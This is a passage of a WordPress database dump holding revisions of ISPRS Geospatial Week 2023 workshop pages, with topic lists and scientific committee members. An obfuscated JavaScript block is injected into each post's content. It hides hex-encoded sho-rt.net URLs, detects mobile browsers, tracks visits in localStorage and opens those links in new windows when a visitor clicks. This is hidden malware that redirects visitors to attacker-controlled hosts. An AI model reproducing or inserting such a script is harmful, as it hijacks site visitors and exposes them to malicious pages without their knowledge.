_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IAMS - Intelligent and autonomous mapping systems','','inherit','closed','closed','','2580-revision-v1','','','2022-10-07 22:13:56','2022-10-07 22:13:56','',2580,'https://gsw2023.com/?p=2616',0,'revision','',0),
(2617,1,'2022-10-07 22:36:27','2022-10-07 22:36:27','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2578\" img_size=\"450x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Recent rapid and revolutionary development of AI-based techniques has brought remarkably eye-catching and competitive achievements in a wide variety of point cloud and image data interpretation tasks including landmark recognition, semantic segmentation, change detection, etc. This workshop will see contributions the topics related the state of the art and future trends addressed the following topics: new point cloud and image algorithm designs, point clouds element detection and segmentation, sensor fusion algorithms, 3D LiDAR from airborne, terrestrial, mobile and backpack autonomous systems and applications, change detection from point cloud and image data, 3D real scene, deep learning methods for point cloud and image processing, etc.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"juicy_pink\" style=\"double\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"40\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:pink;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>3D LiDAR processing</strong></h6>\n</li>\n<li>\n<h6><strong>LiDAR and image fusion systems</strong></h6>\n</li>\n<li>\n<h6><strong>AI-based methods on point cloud processing technologies</strong></h6>\n</li>\n<li>\n<h6><strong>AI-based methods on image processing technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Point cloud and image detection</strong></h6>\n</li>\n<li>\n<h6><strong>Visual Odometry and LiDAR 3D SLAM</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic Segmentation</strong></h6>\n</li>\n<li>\n<h6><strong>Instance Segmentation</strong></h6>\n</li>\n<li>\n<h6><strong>Elements extraction from LiDAR and image data</strong></h6>\n</li>\n<li>\n<h6><strong>LiDAR altimetry</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning algorithms based on LiDAR and image</strong></h6>\n</li>\n<li>\n<h6><strong>Change detection</strong></h6>\n</li>\n<li>\n<h6><strong>Benchmark dataset using point clouds and image</strong></h6>\n</li>\n<li>\n<h6><strong>3D LiDAR from autonomous systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>UAV-based LiDAR and photogrammetry cloud points processing</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Leila Hashemi Beni, North Carolina A&amp;T State University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Luis Miguel González de Santos, University of Vigo, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Haiyan Guan, Nanjing University of Information Science and Technology, China</strong></h6>\n</li>\n<li>\n<h6><strong>Samsung Lim, University of New South Wales, Australia </strong></h6>\n</li>\n<li>\n<h6><strong>Michael A. Chapman,Toronto Metropolitan University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Yuwei Chen, Finnish Geospatial Research Institute (FGI), Finland</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"juicy_pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','AI-PC: AI-based Point Cloud and Image Understanding','','inherit','closed','closed','','2577-revision-v1','','','2022-10-07 22:36:27','2022-10-07 22:36:27','',2577,'https://gsw2023.com/?p=2617',0,'revision','',0),
(2618,1,'2022-10-07 22:36:51','2022-10-07 22:36:51','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2578\" img_size=\"450x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Recent rapid and revolutionary development of AI-based techniques has brought remarkably eye-catching and competitive achievements in a wide variety of point cloud and image data interpretation tasks including landmark recognition, semantic segmentation, change detection, etc. This workshop will see contributions the topics related the state of the art and future trends addressed the following topics: new point cloud and image algorithm designs, point clouds element detection and segmentation, sensor fusion algorithms, 3D LiDAR from airborne, terrestrial, mobile and backpack autonomous systems and applications, change detection from point cloud and image data, 3D real scene, deep learning methods for point cloud and image processing, etc.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"juicy_pink\" style=\"double\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"40\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>3D LiDAR processing</strong></h6>\n</li>\n<li>\n<h6><strong>LiDAR and image fusion systems</strong></h6>\n</li>\n<li>\n<h6><strong>AI-based methods on point cloud processing technologies</strong></h6>\n</li>\n<li>\n<h6><strong>AI-based methods on image processing technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Point cloud and image detection</strong></h6>\n</li>\n<li>\n<h6><strong>Visual Odometry and LiDAR 3D SLAM</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic Segmentation</strong></h6>\n</li>\n<li>\n<h6><strong>Instance Segmentation</strong></h6>\n</li>\n<li>\n<h6><strong>Elements extraction from LiDAR and image data</strong></h6>\n</li>\n<li>\n<h6><strong>LiDAR altimetry</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning algorithms based on LiDAR and image</strong></h6>\n</li>\n<li>\n<h6><strong>Change detection</strong></h6>\n</li>\n<li>\n<h6><strong>Benchmark dataset using point clouds and image</strong></h6>\n</li>\n<li>\n<h6><strong>3D LiDAR from autonomous systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>UAV-based LiDAR and photogrammetry cloud points processing</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Leila Hashemi Beni, North Carolina A&amp;T State University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Luis Miguel González de Santos, University of Vigo, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Haiyan Guan, Nanjing University of Information Science and Technology, China</strong></h6>\n</li>\n<li>\n<h6><strong>Samsung Lim, University of New South Wales, Australia </strong></h6>\n</li>\n<li>\n<h6><strong>Michael A. Chapman,Toronto Metropolitan University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Yuwei Chen, Finnish Geospatial Research 